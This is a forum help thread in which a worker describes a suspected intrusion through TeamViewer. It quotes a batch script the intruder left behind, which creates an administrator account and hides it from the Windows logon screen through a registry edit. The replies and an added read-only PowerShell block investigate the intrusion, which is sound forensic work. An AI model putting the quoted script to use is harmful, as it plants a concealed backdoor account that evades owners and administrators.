[Help] My computer was likely invaded by a foreigner; how can I find his path of invasion?

Time:10-13

Before the National Day holiday, just in case, my office computer is turned off, and TeamViewer was open so that leadership could phone at short notice and ask for some data.
During the holiday, the whole company was on holiday and the office was locked.
Today, the first day back at work, I found that TeamViewer on the computer was closed and the computer was at the logged-off screen. Because I usually use MSTSC over the company intranet to control the computer, at first I did not think anything was wrong.
There were two more things on the desktop: one is a Google Chrome installation file, the English version; the other is a batch file called "Hidden - User. Bat". The file name alone looks very ominous.
Right-clicking the two files shows a creation time of around 2 o'clock in the morning of October 2; at that time nobody at the company could have been remoting into my computer from the intranet.
I opened the batch file with Notepad; below is the code:
CD \
CLS
REM "Mr_hosseinazer/hide the user"
REM ------------------------------
@echo off
set /p user=Enter Desired Username:
set /p pass=Enter Desired Password:
net user %user% %pass% /add
net localgroup administrators %user% /add
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v %user% /t REG_DWORD /d 0
pause
I can roughly understand it: a man called "hussein azeri" wrote the script, and its use is to input a user name and password and create a user with the system administrator role. What the registry command below that is for, I don't know.
I went into Local Users and Groups, but I didn't find any new administrator account, so the one the man created should have been deleted.
I also cannot find the Google browser among the applications, so it should also have been uninstalled.
The Windows logs contain a lot of operation records, from October 1 until October 3, but there are too many records and I don't see a clue.
What I fear now is that the intruder tampered with the company database, because I have the database password saved.
And how can I find out what changes the man made to my computer, and whether I have to reinstall?
Finally, the intrusion path of this guy: he should have used TeamViewer to remote into my computer at the beginning. The TeamViewer log shows that on October 1 a new computer set up a connection with mine, but TeamViewer was closed that same day, so the guy used other ways to control my computer.
Is there any offense-and-defense expert who can help me sort out which loopholes I need to patch?

CodePudding user response:

Disconnect the machine from the network. First check the server logs to see whether there was any operation, then check the machine's own logs to see whether there is a record.
The registry entry should be for the account given to your administrator and user groups, so that it may not be displayed.
Check the registry keys.
The TeamViewer login time should be in a log.
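
The checks listed in this reply, written out as an added PowerShell example (not part of the original thread): it is read-only, lists accounts named under the registry key the batch file writes to, shows the current local administrators, narrows the Security log to account and remote-logon events for October 1 to 3, and prints TeamViewer's incoming-connection history. The `-Year` parameter and the TeamViewer install folders are assumptions, since the post gives neither.

```powershell
# Added triage example; run in an elevated Windows PowerShell 5.1 session.
# Assumption: -Year defaults to the current year because the post gives no year.
param([int]$Year = (Get-Date).Year)
$start = (Get-Date -Year $Year -Month 10 -Day 1).Date
$end   = (Get-Date -Year $Year -Month 10 -Day 4).Date

# 1. Value names under the key the batch file writes to are account names.
$key = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList'
if (Test-Path $key) {
    $item = Get-Item $key
    $item.GetValueNames() | ForEach-Object {
        [pscustomobject]@{
            Account     = $_
            Value       = $item.GetValue($_)
            StillExists = [bool](Get-LocalUser -Name $_ -ErrorAction SilentlyContinue)
        }
    } | Format-Table -AutoSize
} else { 'No SpecialAccounts\UserList key present' }

# 2. Current local administrators, by well-known SID so it works on localized Windows.
Get-LocalGroupMember -SID 'S-1-5-32-544' |
    Select-Object Name, ObjectClass, PrincipalSource | Format-Table -AutoSize

# 3. Security log, 1-3 October only: 4720 account created, 4726 account deleted,
#    4732/4733 member added to/removed from a local group, 4624 logon.
$filter = @{ LogName = 'Security'; Id = 4720, 4726, 4732, 4733, 4624
             StartTime = $start; EndTime = $end }
Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
    $d = @{}
    ([xml]$_.ToXml()).Event.EventData.Data | ForEach-Object { $d[$_.Name] = $_.'#text' }
    # Of the logons, keep only type 10 (RemoteInteractive, i.e. MSTSC/RDP).
    if ($_.Id -eq 4624 -and $d['LogonType'] -ne '10') { return }
    [pscustomobject]@{
        Time = $_.TimeCreated; Id = $_.Id
        Target = $d['TargetUserName']; Member = $d['MemberSid']
        By = $d['SubjectUserName']; SourceIp = $d['IpAddress']
    }
} | Sort-Object Time | Format-Table -AutoSize

# 4. TeamViewer's incoming-connection history (assumed default install folders).
$roots = $env:ProgramFiles, ${env:ProgramFiles(x86)} | Where-Object { $_ }
foreach ($root in $roots) {
    $log = Join-Path $root 'TeamViewer\Connections_incoming.txt'
    if (Test-Path $log) { Get-Content $log | Select-Object -Last 20 }
}
```

A 4720 event followed by a 4726 for the same target name in that window would match an account that was created and later deleted; an empty result from step 3 can also mean the Security log was cleared or has rolled over.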